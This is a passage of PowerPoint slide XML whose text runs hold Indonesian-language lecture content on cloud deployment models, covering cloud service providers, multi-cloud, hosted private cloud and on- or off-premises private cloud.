              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud (CSP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembiayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pay-as-you-go, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gratis. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> multi-cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CSP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Hosted Private</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-di-host oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksklusif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjamin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harganya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mahal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didedikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditujukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Private cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemadaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fasilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
